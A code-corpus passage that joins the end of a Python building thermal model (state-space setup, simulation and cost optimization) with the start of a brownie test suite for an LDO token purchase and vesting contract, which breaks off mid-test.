+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
/ (surface_data.at['heat_transfer_coefficient_conduction_surface'])
) ** (- 1)
)
disturbance_output_matrix[
surface_data.at['surface_name'] + '_convection_interior',
'ambient_air_temperature'
] += (
(
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
)
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
/ (surface_data.at['heat_transfer_coefficient_conduction_surface'])
) ** (- 1)
)
disturbance_output_matrix[
surface_data.at['surface_name'] + '_convection_interior',
'sky_temperature'
] += (
surface_data.at['heat_transfer_coefficient_surface_sky']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
/ (surface_data.at['heat_transfer_coefficient_conduction_surface'])
) ** (- 1)
)
state_output_matrix[
surface_data.at['surface_name'] + '_convection_interior',
surface_data.at['zone_name'] + '_temperature'
] += (
- 1.0
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
/ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
+ 1.0
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ 1.0
/ (surface_data.at['heat_transfer_coefficient_conduction_surface'])
) ** (- 1)
)
for zone_exterior_surface_name, zone_exterior_surface_data in building_data.surfaces_exterior[
building_data.surfaces_exterior['zone_name'] == surface_data.at['zone_name']
].iterrows():
# Interior irradiation through all exterior surfaces adjacent to the zone
disturbance_output_matrix[
surface_data.at['surface_name'] + '_convection_interior',
'irradiation_' + zone_exterior_surface_data.at['direction_name']
] += (
(
zone_exterior_surface_data.at['surface_area']
* zone_exterior_surface_data.at['window_wall_ratio']
/ zone_surface_area
) # Considers the share at the respective surface
* surface_data.at['absorptivity_surface']
* (1 - surface_data.at['window_wall_ratio'])
* (1.0 - (
1.0
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
/ (surface_data.at['heat_transfer_coefficient_conduction_surface'])
) ** (- 1))
)
def define_disturbance_timeseries():
# Reindex, interpolate and construct full disturbance timeseries.
self.disturbance_timeseries = pd.concat(
[
building_data.weather_timeseries[[
'ambient_air_temperature',
'sky_temperature',
'irradiation_horizontal',
'irradiation_east',
'irradiation_south',
'irradiation_west',
'irradiation_north'
]],
building_data.internal_gain_timeseries,
pd.DataFrame(1.0, index=self.timesteps, columns=['constant'])
],
axis='columns',
).rename_axis('disturbance_name', axis='columns')
def define_electricity_price_timeseries():
if pd.isnull(building_data.scenarios.at['price_type']):
# If no price_type defined, generate a flat price signal.
self.electricity_price_timeseries = (
pd.DataFrame(
[[None, None, 1.0]],
columns=['time', 'price_type', 'price'],
index=self.timesteps
)
)
self.electricity_price_timeseries['time'] = self.timesteps
else:
self.electricity_price_timeseries = building_data.electricity_price_timeseries
def define_output_constraint_timeseries():
# Do not define constraints, if `constraint_type` not defined for any zones.
if any(pd.isnull(building_data.zones['constraint_type'])):
logger.debug('Skipping definition of constraint timeseries due to missing constraint type definition.')
return
# Instantiate constraint timeseries.
self.output_maximum_timeseries = pd.DataFrame(
+ 1.0 * np.infty,
self.timesteps,
self.outputs
)
self.output_minimum_timeseries = pd.DataFrame(
- 1.0 * np.infty,
self.timesteps,
self.outputs
)
# Obtain indexing shorthands.
# - Indoor air quality constraints are only enforced if there is a fresh air supply device, e.g. AHU / vent.
zones_fixed_fresh_air_flow_index = (
(
pd.notnull(building_data.zones['hvac_ahu_type'])
| pd.notnull(building_data.zones['hvac_vent_type'])
)
& pd.isnull(building_data.zones['fresh_air_flow_control_type'])
)
zones_occupancy_based_index = (
(
pd.notnull(building_data.zones['hvac_ahu_type'])
| pd.notnull(building_data.zones['hvac_vent_type'])
)
& (building_data.zones['fresh_air_flow_control_type'] == 'occupancy_based')
)
zones_co2_based_index = (
(
pd.notnull(building_data.zones['hvac_ahu_type'])
| pd.notnull(building_data.zones['hvac_vent_type'])
)
& (building_data.zones['fresh_air_flow_control_type'] == 'co2_based')
)
zones_humidity_based_index = (
(
pd.notnull(building_data.zones['hvac_ahu_type'])
| pd.notnull(building_data.zones['hvac_vent_type'])
)
& (building_data.zones['humidity_control_type'] == 'humidity_based')
)
# Minimum constraint for power outputs.
self.output_minimum_timeseries.loc[
:, self.outputs.str.contains('_power')
] = 0.0
# Minimum constraint for flow outputs.
self.output_minimum_timeseries.loc[
:, self.outputs.str.contains('_flow')
] = 0.0
# Minimum / maximum constraint for balance outputs.
self.output_minimum_timeseries.loc[
:, self.outputs.str.contains('_balance')
] = 0.0
self.output_maximum_timeseries.loc[
:, self.outputs.str.contains('_balance')
] = 0.0
# Minimum / maximum constraint for zone air temperature.
self.output_minimum_timeseries.loc[
:, building_data.zones['zone_name'] + '_temperature'
] = (
building_data.constraint_timeseries.loc[
:, building_data.zones['constraint_type'] + '_minimum_air_temperature'
]
).values
self.output_maximum_timeseries.loc[
:, building_data.zones['zone_name'] + '_temperature'
] = (
building_data.constraint_timeseries.loc[
:, building_data.zones['constraint_type'] + '_maximum_air_temperature'
]
).values
# Minimum constraint for fixed zone fresh air flow.
if zones_fixed_fresh_air_flow_index.any():
self.output_minimum_timeseries.loc[
:, building_data.zones.loc[zones_fixed_fresh_air_flow_index, 'zone_name'] + '_total_fresh_air_flow'
] = (
building_data.constraint_timeseries.loc[
:, (
building_data.zones.loc[zones_fixed_fresh_air_flow_index, 'constraint_type']
+ '_minimum_fresh_air_flow'
)
].values
)
# Minimum constraint for occupancy-based zone fresh air flow.
if zones_occupancy_based_index.any():
self.output_minimum_timeseries.loc[
:, building_data.zones.loc[zones_occupancy_based_index, 'zone_name'] + '_total_fresh_air_flow'
] = (
building_data.constraint_timeseries.loc[
:, (
building_data.zones.loc[zones_occupancy_based_index, 'constraint_type']
+ '_minimum_fresh_air_flow_building'
)
].values
+ building_data.constraint_timeseries.loc[
:, (
building_data.zones.loc[zones_occupancy_based_index, 'constraint_type']
+ '_minimum_fresh_air_flow_occupants'
)
].values
* building_data.internal_gain_timeseries.loc[
:, (
building_data.zones.loc[zones_occupancy_based_index, 'internal_gain_type']
+ '_internal_gain_occupancy'
)
].values
* building_data.zones.loc[zones_occupancy_based_index, 'occupancy_density'].values
)
# Maximum constraint for zone CO2 concentration.
if zones_co2_based_index.any():
self.output_minimum_timeseries.loc[
:, building_data.zones.loc[zones_co2_based_index, 'zone_name'] + '_co2_concentration'
] = (
building_data.constraint_timeseries.loc[
:, (
building_data.zones.loc[zones_co2_based_index, 'constraint_type']
+ '_maximum_co2_concentration'
)
]
).values
# Minimum / maximum constraint for zone humidity concentration.
if zones_humidity_based_index.any():
self.output_minimum_timeseries.loc[
:, building_data.zones.loc[zones_humidity_based_index, 'zone_name'] + '_absolute_humidity'
] = (
np.vectorize(cobmo.utils.calculate_absolute_humidity_humid_air)(
building_data.scenarios.at['linearization_zone_air_temperature'],
building_data.constraint_timeseries.loc[
:, (
building_data.zones.loc[zones_humidity_based_index, 'constraint_type']
+ '_minimum_relative_humidity'
)
]
)
)
self.output_maximum_timeseries.loc[
:, building_data.zones.loc[zones_humidity_based_index, 'zone_name'] + '_absolute_humidity'
] = (
np.vectorize(cobmo.utils.calculate_absolute_humidity_humid_air)(
building_data.scenarios.at['linearization_zone_air_temperature'],
building_data.constraint_timeseries.loc[
:, (
building_data.zones.loc[zones_humidity_based_index, 'constraint_type']
+ '_maximum_relative_humidity'
)
]
)
)
# Minimum / maximum constraints for storage state of charge.
if pd.notnull(building_data.scenarios.at['storage_type']):
self.output_minimum_timeseries.loc[
:, 'storage_state_of_charge'
] = 0.0
self.output_maximum_timeseries.loc[
:, 'storage_state_of_charge'
] = 100.0 # in %.
# Electric / thermal grid connections.
if (not connect_electric_grid) and connect_thermal_grid_cooling:
self.output_maximum_timeseries.loc[
:, 'plant_thermal_power_cooling'
] = 0.0
if (not connect_electric_grid) and connect_thermal_grid_heating:
self.output_maximum_timeseries.loc[
:, 'plant_thermal_power_heating'
] = 0.0
if not connect_thermal_grid_cooling:
self.output_maximum_timeseries.loc[
:, 'grid_thermal_power_cooling'
] = 0.0
if not connect_thermal_grid_heating:
self.output_maximum_timeseries.loc[
:, 'grid_thermal_power_heating'
] = 0.0
def discretize_model():
# Discretize state space model with zero order hold.
# - Reference: <https://en.wikipedia.org/wiki/Discretization#Discretization_of_linear_state_space_models>
state_matrix_discrete = scipy.linalg.expm(
self.state_matrix.values
* self.timestep_interval.seconds
)
control_matrix_discrete = (
np.linalg.matrix_power(
self.state_matrix.values,
-1
).dot(
state_matrix_discrete
- np.identity(self.state_matrix.shape[0])
).dot(
self.control_matrix.values
)
)
disturbance_matrix_discrete = (
np.linalg.matrix_power(
self.state_matrix.values,
-1
).dot(
state_matrix_discrete
- np.identity(self.state_matrix.shape[0])
).dot(
self.disturbance_matrix.values
)
)
self.state_matrix[:] = state_matrix_discrete
self.control_matrix[:] = control_matrix_discrete
self.disturbance_matrix[:] = disturbance_matrix_discrete
# Define initial state.
define_initial_state()
# Calculate parameters / coefficients.
calculate_coefficients_zone()
calculate_coefficients_surface()
calculate_coefficients_radiator()
# Define heat, CO2 and humidity transfers.
define_heat_transfer_surfaces_exterior()
define_heat_transfer_surfaces_interior()
define_heat_transfer_surfaces_adiabatic()
define_heat_transfer_infiltration()
define_heat_transfer_internal_gains()
define_heat_transfer_hvac_generic()
define_heat_transfer_hvac_radiator()
define_heat_transfer_hvac_ahu()
define_heat_transfer_hvac_tu()
define_heat_transfer_hvac_vent()
define_co2_transfer()
define_humidity_transfer()
define_storage_state_of_charge()
# Define outputs.
define_output_zone_temperature()
define_output_zone_co2_concentration()
define_output_zone_humidity()
define_output_internal_gain_power()
define_output_hvac_generic()
define_output_hvac_radiator_power()
define_output_hvac_ahu_power()
define_output_hvac_tu_power()
define_output_hvac_vent_power()
define_output_fresh_air_flow()
define_output_storage_state_of_charge()
define_output_storage_power()
define_output_plant_power()
define_output_grid_power()
# Define validation outputs.
if with_validation_outputs:
define_output_validation_surface_temperature()
define_output_validation_surfaces_exterior_irradiation_gain_exterior()
define_output_validation_surfaces_exterior_convection_interior()
# Define timeseries.
define_disturbance_timeseries()
define_electricity_price_timeseries()
define_output_constraint_timeseries()
# Convert matrix constructors to dataframes.
self.state_matrix = state_matrix.to_dataframe_dense()
self.control_matrix = control_matrix.to_dataframe_dense()
self.disturbance_matrix = disturbance_matrix.to_dataframe_dense()
self.state_output_matrix = state_output_matrix.to_dataframe_dense()
self.control_output_matrix = control_output_matrix.to_dataframe_dense()
self.disturbance_output_matrix = disturbance_output_matrix.to_dataframe_dense()
# Convert to time discrete model.
discretize_model()
def simulate(
self,
control_vector: pd.DataFrame,
state_vector_initial=None,
disturbance_timeseries=None
) -> typing.Tuple[pd.DataFrame, pd.DataFrame]:
"""Simulate building model for given control vector timeseries to obtain state vector timeseries and
output vector timeseries.
- The simulation is based on the iterative solution of the state space equations.
- The required initial state vector and disturbance timeseries are obtained from
the building model definition or can be provided through keyword arguments.
:syntax:
`building_model.simulate(control_vector)`: Simulate `building_model` for given `control_vector`.
Arguments:
control_vector (pd.DataFrame): Control vector timeseries, as dataframe with control variables as columns and
timesteps as rows.
Keyword Arguments:
state_vector_initial (pd.Series): Initial state vector values, as series with state variables as index.
Defaults to the initial state vector in the building model definition.
disturbance_timeseries (pd.DataFrame): Disturbance vector timeseries, sa dataframe with disturbance
variables as columns and timesteps as rows. Defaults to the disturbance timeseries in the building
model definition.
Returns:
typing.Tuple[pd.DataFrame, pd.DataFrame]: State vector timeseries, as dataframe with state variables as rows
and timesteps as columns. Output vector timeseries, as dataframe with output variables as rows and
timesteps as columns.
"""
# Obtain initial state vector and disturbance timeseries.
if state_vector_initial is None:
state_vector_initial = self.state_vector_initial
if disturbance_timeseries is None:
disturbance_timeseries = self.disturbance_timeseries
# Initialize state and output timeseries.
state_vector = pd.DataFrame(
np.nan,
self.timesteps,
self.states
)
state_vector.loc[self.timesteps[0], :] = state_vector_initial
output_vector = pd.DataFrame(
np.nan,
self.timesteps,
self.outputs
)
# Iterative solution of the state space equations.
# - The following equations directly use the underlying numpy arrays for faster evaluation.
for timestep in range(len(self.timesteps) - 1):
state_vector.values[timestep + 1, :] = (
self.state_matrix.values @ state_vector.values[timestep, :]
+ self.control_matrix.values @ control_vector.values[timestep, :]
+ self.disturbance_matrix.values @ disturbance_timeseries.values[timestep, :]
)
for timestep in range(len(self.timesteps)):
output_vector.values[timestep, :] = (
self.state_output_matrix.values @ state_vector.values[timestep, :]
+ self.control_output_matrix.values @ control_vector.values[timestep, :]
+ self.disturbance_output_matrix.values @ disturbance_timeseries.values[timestep, :]
)
return (
state_vector,
output_vector
)
def define_optimization_variables(
self,
optimization_problem: cobmo.utils.OptimizationProblem,
):
# Define variables.
# - Defined as dict with single entry for current DER. This is for compability of
# `define_optimization_constraints`, etc. with `DERModelSet`.
optimization_problem.state_vector = cp.Variable((len(self.timesteps), len(self.states)))
optimization_problem.control_vector = cp.Variable((len(self.timesteps), len(self.controls)))
optimization_problem.output_vector = cp.Variable((len(self.timesteps), len(self.outputs)))
def define_optimization_constraints(
self,
optimization_problem: cobmo.utils.OptimizationProblem,
initial_state_is_final_state=False
):
# Initial state.
# - If desired, initial state is set equal to final state. This enables automatic selection of the
# optimal initial state, assuming that the start and end timestep are the same time of day.
if initial_state_is_final_state:
optimization_problem.constraints.append(
optimization_problem.state_vector[0, :]
==
optimization_problem.state_vector[-1, :]
)
# - Otherwise, set initial state according to the initial state vector.
else:
optimization_problem.constraints.append(
optimization_problem.state_vector[0, :]
==
self.state_vector_initial.values
)
# State equation.
optimization_problem.constraints.append(
optimization_problem.state_vector[1:, :]
==
cp.transpose(
self.state_matrix.values
@ cp.transpose(optimization_problem.state_vector[:-1, :])
+ self.control_matrix.values
@ cp.transpose(optimization_problem.control_vector[:-1, :])
+ self.disturbance_matrix.values
@ np.transpose(self.disturbance_timeseries.iloc[:-1, :].values)
)
)
# Output equation.
optimization_problem.constraints.append(
optimization_problem.output_vector
==
cp.transpose(
self.state_output_matrix.values
@ cp.transpose(optimization_problem.state_vector)
+ self.control_output_matrix.values
@ cp.transpose(optimization_problem.control_vector)
+ self.disturbance_output_matrix.values
@ np.transpose(self.disturbance_timeseries.values)
)
)
# Output limits.
optimization_problem.constraints.append(
optimization_problem.output_vector
>=
self.output_minimum_timeseries.values
)
optimization_problem.constraints.append(
optimization_problem.output_vector
<=
self.output_maximum_timeseries.values
)
def define_optimization_objective(
self,
optimization_problem: cobmo.utils.OptimizationProblem
):
# Obtain timestep interval in hours, for conversion of power to energy.
timestep_interval_hours = (self.timesteps[1] - self.timesteps[0]) / pd.Timedelta('1h')
# Define operation cost (OPEX).
optimization_problem.operation_cost = (
optimization_problem.output_vector[:, self.outputs.get_loc('grid_electric_power')]
* self.zone_area_total # W/m² in W.
* timestep_interval_hours / 1000.0 # W in kWh.
@ self.electricity_price_timeseries['price'].values
)
# Add to objective.
optimization_problem.objective += optimization_problem.operation_cost
def get_optimization_results(
self,
optimization_problem: cobmo.utils.OptimizationProblem
) -> dict:
# Obtain results.
state_vector = (
pd.DataFrame(
optimization_problem.state_vector.value,
index=self.timesteps,
columns=self.states
)
)
control_vector = (
pd.DataFrame(
optimization_problem.control_vector.value,
index=self.timesteps,
columns=self.controls
)
)
output_vector = (
pd.DataFrame(
optimization_problem.output_vector.value,
index=self.timesteps,
columns=self.outputs
)
)
operation_cost = optimization_problem.operation_cost.value
return dict(
state_vector=state_vector,
control_vector=control_vector,
output_vector=output_vector,
operation_cost=operation_cost
)
def optimize(self):
"""Optimize the operation, i.e. the control vector, of the building model to minimize operation cost, subject to
output minimum / maximum constraints. Returns results as dictionary containing state, control and output
vector timeseries along with the operation cost.
- The price timeseries is obtained from the building model definition.
- The required initial state vector and disturbance timeseries are obtained from
the building model definition.
:syntax:
`building_model.optimize(): Optimize the operation of `building_model` and return the results.
Returns:
dict: Results dictionary with keys `state_vector`, `control_vector`, `output_vector` and
`operation_cost`. State vector timeseries `state_vector`, as dataframe with state variables as rows
and timesteps as columns. Control vector timeseries `control_vector`, as dataframe with control
variables as rows and timesteps as columns. Output vector timeseries `output_vector`, as dataframe
with output variables as rows and timesteps as columns. Total operation cost as float `operation_cost`.
"""
# Instantiate optimization problem.
optimization_problem = cobmo.utils.OptimizationProblem()
# Define optimization problem.
self.define_optimization_variables(optimization_problem)
self.define_optimization_constraints(optimization_problem)
self.define_optimization_objective(optimization_problem)
# Solve optimization problem.
optimization_problem.solve()
# Obtain results.
results = self.get_optimization_results(optimization_problem)
return results
| 51.035908 | 126 | 0.471693 | 16,775 | 207,512 | 5.411386 | 0.02927 | 0.044087 | 0.057713 | 0.057559 | 0.877677 | 0.84215 | 0.813442 | 0.784536 | 0.751333 | 0.720499 | 0 | 0.009829 | 0.456248 | 207,512 | 4,065 | 127 | 51.048462 | 0.794674 | 0.083099 | 0 | 0.726961 | 0 | 0 | 0.208068 | 0.150454 | 0 | 0 | 0 | 0.000246 | 0 | 1 | 0.012839 | false | 0 | 0.002568 | 0 | 0.021969 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ca9a043d8eebffd5d475acc4a3a6b18398a52bce | 17,261 | py | Python | tests/test_ldo_purchase.py | banteg/ldo-purchase-executor | 5fcf3cd2aef126219b72763c5dc5377d96a61ec1 | [
"MIT"
] | 9 | 2021-04-07T06:54:57.000Z | 2021-11-17T17:42:32.000Z | tests/test_ldo_purchase.py | banteg/ldo-purchase-executor | 5fcf3cd2aef126219b72763c5dc5377d96a61ec1 | [
"MIT"
] | 1 | 2021-05-01T13:23:05.000Z | 2021-05-01T13:23:05.000Z | tests/test_ldo_purchase.py | banteg/ldo-purchase-executor | 5fcf3cd2aef126219b72763c5dc5377d96a61ec1 | [
"MIT"
] | 1 | 2021-09-06T02:24:34.000Z | 2021-09-06T02:24:34.000Z | import pytest
from brownie import Wei, chain, reverts
from brownie.network.state import Chain
from purchase_config import ETH_TO_LDO_RATE_PRECISION
LDO_ALLOCATIONS = [
1_000 * 10**18,
3_000_000 * 10**18,
20_000_000 * 10**18
]
# 100 LDO in one ETH
ETH_TO_LDO_RATE = 100 * 10**18
VESTING_START_DELAY = 1 * 60 * 60 * 24 * 365 # one year
VESTING_END_DELAY = 2 * 60 * 60 * 24 * 365 # two years
OFFER_EXPIRATION_DELAY = 2629746 # one month
DIRECT_TRANSFER_GAS_LIMIT = 400_000
@pytest.fixture(scope='function')
def executor(accounts, deploy_executor_and_pass_dao_vote):
executor = deploy_executor_and_pass_dao_vote(
eth_to_ldo_rate=ETH_TO_LDO_RATE,
vesting_start_delay=VESTING_START_DELAY,
vesting_end_delay=VESTING_END_DELAY,
offer_expiration_delay=OFFER_EXPIRATION_DELAY,
ldo_purchasers=[ (accounts[i], LDO_ALLOCATIONS[i]) for i in range(0, len(LDO_ALLOCATIONS)) ],
allocations_total=sum(LDO_ALLOCATIONS)
)
executor.start({ 'from': accounts[0] })
return executor
def test_deploy_fails_on_wrong_allocations_total(accounts, deploy_executor_and_pass_dao_vote):
with reverts():
deploy_executor_and_pass_dao_vote(
eth_to_ldo_rate=ETH_TO_LDO_RATE,
vesting_start_delay=VESTING_START_DELAY,
vesting_end_delay=VESTING_END_DELAY,
offer_expiration_delay=OFFER_EXPIRATION_DELAY,
ldo_purchasers=[ (accounts[i], LDO_ALLOCATIONS[i]) for i in range(0, len(LDO_ALLOCATIONS)) ],
allocations_total=sum(LDO_ALLOCATIONS) + 1
)
def test_deploy_fails_on_zero_rate(accounts, deploy_executor_and_pass_dao_vote):
with reverts():
deploy_executor_and_pass_dao_vote(
eth_to_ldo_rate=0,
vesting_start_delay=VESTING_START_DELAY,
vesting_end_delay=VESTING_END_DELAY,
offer_expiration_delay=OFFER_EXPIRATION_DELAY,
ldo_purchasers=[ (accounts[i], LDO_ALLOCATIONS[i]) for i in range(0, len(LDO_ALLOCATIONS)) ],
allocations_total=sum(LDO_ALLOCATIONS)
)
def test_deploy_fails_on_vesting_ends_before_start(accounts, deploy_executor_and_pass_dao_vote):
with reverts():
deploy_executor_and_pass_dao_vote(
eth_to_ldo_rate=ETH_TO_LDO_RATE,
vesting_start_delay=VESTING_START_DELAY,
vesting_end_delay=VESTING_START_DELAY - 1,
offer_expiration_delay=OFFER_EXPIRATION_DELAY,
ldo_purchasers=[ (accounts[i], LDO_ALLOCATIONS[i]) for i in range(0, len(LDO_ALLOCATIONS)) ],
allocations_total=sum(LDO_ALLOCATIONS)
)
def test_deploy_fails_on_zero_offer_exparation_delay(accounts, deploy_executor_and_pass_dao_vote):
with reverts():
deploy_executor_and_pass_dao_vote(
eth_to_ldo_rate=ETH_TO_LDO_RATE,
vesting_start_delay=VESTING_START_DELAY,
vesting_end_delay=VESTING_END_DELAY,
offer_expiration_delay=0,
ldo_purchasers=[ (accounts[i], LDO_ALLOCATIONS[i]) for i in range(0, len(LDO_ALLOCATIONS)) ],
allocations_total=sum(LDO_ALLOCATIONS)
)
def test_deploy_fails_on_purchasers_duplicates(accounts, deploy_executor_and_pass_dao_vote):
with reverts():
deploy_executor_and_pass_dao_vote(
eth_to_ldo_rate=ETH_TO_LDO_RATE,
vesting_start_delay=VESTING_START_DELAY,
vesting_end_delay=VESTING_END_DELAY,
offer_expiration_delay=OFFER_EXPIRATION_DELAY,
ldo_purchasers=[ (accounts[0], LDO_ALLOCATIONS[0]) for i in range(0, len(LDO_ALLOCATIONS)) ],
allocations_total=sum(LDO_ALLOCATIONS)
)
def test_executor_config_is_correct(executor):
assert executor.eth_to_ldo_rate() == ETH_TO_LDO_RATE
assert executor.vesting_start_delay() == VESTING_START_DELAY
assert executor.vesting_end_delay() == VESTING_END_DELAY
assert executor.offer_expiration_delay() == OFFER_EXPIRATION_DELAY
assert executor.ldo_allocations_total() == sum(LDO_ALLOCATIONS)
assert executor.offer_started()
assert executor.offer_expires_at() == executor.offer_started_at() + OFFER_EXPIRATION_DELAY
def test_purchase_via_transfer(accounts, executor, dao_agent, helpers, ldo_token, dao_token_manager):
purchaser = accounts[0]
purchase_ldo_amount = LDO_ALLOCATIONS[0]
eth_cost = purchase_ldo_amount * ETH_TO_LDO_RATE_PRECISION // ETH_TO_LDO_RATE
allocation = executor.get_allocation(purchaser)
assert allocation[0] == purchase_ldo_amount
assert allocation[1] == eth_cost
helpers.fund_with_eth(purchaser, eth_cost)
dao_eth_balance_before = dao_agent.balance()
tx = purchaser.transfer(to=executor, amount=eth_cost, gas_limit=DIRECT_TRANSFER_GAS_LIMIT)
purchase_evt = helpers.assert_single_event_named('PurchaseExecuted', tx)
assert purchase_evt['ldo_receiver'] == purchaser
assert purchase_evt['ldo_allocation'] == purchase_ldo_amount
assert purchase_evt['eth_cost'] == eth_cost
dao_eth_balance_increase = dao_agent.balance() - dao_eth_balance_before
assert dao_eth_balance_increase == eth_cost
assert ldo_token.balanceOf(purchaser) == purchase_ldo_amount
vesting = dao_token_manager.getVesting(purchaser, purchase_evt['vesting_id'])
assert vesting['amount'] == purchase_ldo_amount
assert vesting['start'] == tx.timestamp + VESTING_START_DELAY
assert vesting['cliff'] == tx.timestamp + VESTING_START_DELAY
assert vesting['vesting'] == tx.timestamp + VESTING_END_DELAY
assert vesting['revokable'] == False
def test_purchase_via_execute_purchase(accounts, executor, dao_agent, helpers, ldo_token, dao_token_manager):
purchaser = accounts[0]
purchase_ldo_amount = LDO_ALLOCATIONS[0]
eth_cost = purchase_ldo_amount * ETH_TO_LDO_RATE_PRECISION // ETH_TO_LDO_RATE
allocation = executor.get_allocation(purchaser)
assert allocation[0] == purchase_ldo_amount
assert allocation[1] == eth_cost
helpers.fund_with_eth(purchaser, eth_cost)
dao_eth_balance_before = dao_agent.balance()
tx = executor.execute_purchase(purchaser, { 'from': purchaser, 'value': eth_cost })
purchase_evt = helpers.assert_single_event_named('PurchaseExecuted', tx)
assert purchase_evt['ldo_receiver'] == purchaser
assert purchase_evt['ldo_allocation'] == purchase_ldo_amount
assert purchase_evt['eth_cost'] == eth_cost
dao_eth_balance_increase = dao_agent.balance() - dao_eth_balance_before
assert dao_eth_balance_increase == eth_cost
assert ldo_token.balanceOf(purchaser) == purchase_ldo_amount
vesting = dao_token_manager.getVesting(purchaser, purchase_evt['vesting_id'])
assert vesting['amount'] == purchase_ldo_amount
assert vesting['start'] == tx.timestamp + VESTING_START_DELAY
assert vesting['cliff'] == tx.timestamp + VESTING_START_DELAY
assert vesting['vesting'] == tx.timestamp + VESTING_END_DELAY
assert vesting['revokable'] == False
def test_stranger_not_allowed_to_purchase_via_execute_purchase(accounts, executor, helpers):
purchase_ldo_amount = LDO_ALLOCATIONS[0]
stranger = accounts[5]
eth_cost = purchase_ldo_amount * ETH_TO_LDO_RATE_PRECISION // ETH_TO_LDO_RATE
allocation = executor.get_allocation(stranger)
assert allocation[0] == 0
assert allocation[1] == 0
helpers.fund_with_eth(stranger, eth_cost)
with reverts("no allocation"):
executor.execute_purchase(stranger, { 'from': stranger, 'value': eth_cost })
def test_stranger_not_allowed_to_purchase_via_transfer(accounts, executor, helpers):
purchase_ldo_amount = LDO_ALLOCATIONS[0]
stranger = accounts[5]
allocation = executor.get_allocation(stranger)
assert allocation[0] == 0
assert allocation[1] == 0
eth_cost = purchase_ldo_amount * ETH_TO_LDO_RATE_PRECISION // ETH_TO_LDO_RATE
helpers.fund_with_eth(stranger, eth_cost)
with reverts("no allocation"):
executor.execute_purchase(stranger, { 'from': stranger, 'value': eth_cost })
def test_stranger_allowed_to_purchase_token_for_purchaser_via_execute_purchase(accounts, executor, dao_agent, helpers, ldo_token, dao_token_manager):
purchaser = accounts[0]
purchase_ldo_amount = LDO_ALLOCATIONS[0]
stranger = accounts[5]
eth_cost = purchase_ldo_amount * ETH_TO_LDO_RATE_PRECISION // ETH_TO_LDO_RATE
allocation = executor.get_allocation(purchaser)
assert allocation[0] == purchase_ldo_amount
assert allocation[1] == eth_cost
helpers.fund_with_eth(stranger, eth_cost)
dao_eth_balance_before = dao_agent.balance()
tx = executor.execute_purchase(purchaser, { 'from': stranger, 'value': eth_cost })
purchase_evt = helpers.assert_single_event_named('PurchaseExecuted', tx)
assert purchase_evt['ldo_receiver'] == purchaser
assert purchase_evt['ldo_allocation'] == purchase_ldo_amount
assert purchase_evt['eth_cost'] == eth_cost
dao_eth_balance_increase = dao_agent.balance() - dao_eth_balance_before
assert dao_eth_balance_increase == eth_cost
assert ldo_token.balanceOf(purchaser) == purchase_ldo_amount
vesting = dao_token_manager.getVesting(purchaser, purchase_evt['vesting_id'])
assert vesting['amount'] == purchase_ldo_amount
assert vesting['start'] == tx.timestamp + VESTING_START_DELAY
assert vesting['cliff'] == tx.timestamp + VESTING_START_DELAY
assert vesting['vesting'] == tx.timestamp + VESTING_END_DELAY
assert vesting['revokable'] == False
def test_purchase_via_transfer_not_allowed_with_insufficient_funds(accounts, executor, dao_agent, helpers):
purchaser = accounts[0]
purchase_ldo_amount = LDO_ALLOCATIONS[0]
eth_cost = purchase_ldo_amount * ETH_TO_LDO_RATE_PRECISION // ETH_TO_LDO_RATE
allocation = executor.get_allocation(purchaser)
assert allocation[0] == purchase_ldo_amount
assert allocation[1] == eth_cost
eth_cost = eth_cost - 1e18
helpers.fund_with_eth(purchaser, eth_cost)
with reverts("insufficient funds"):
purchaser.transfer(to=executor, amount=eth_cost, gas_limit=DIRECT_TRANSFER_GAS_LIMIT)
def test_purchase_via_execute_purchase_not_allowed_with_insufficient_funds(accounts, executor, helpers):
purchaser = accounts[0]
purchase_ldo_amount = LDO_ALLOCATIONS[0]
eth_cost = purchase_ldo_amount * ETH_TO_LDO_RATE_PRECISION // ETH_TO_LDO_RATE
allocation = executor.get_allocation(purchaser)
assert allocation[0] == purchase_ldo_amount
assert allocation[1] == eth_cost
eth_cost = eth_cost - 1e18
helpers.fund_with_eth(purchaser, eth_cost)
with reverts("insufficient funds"):
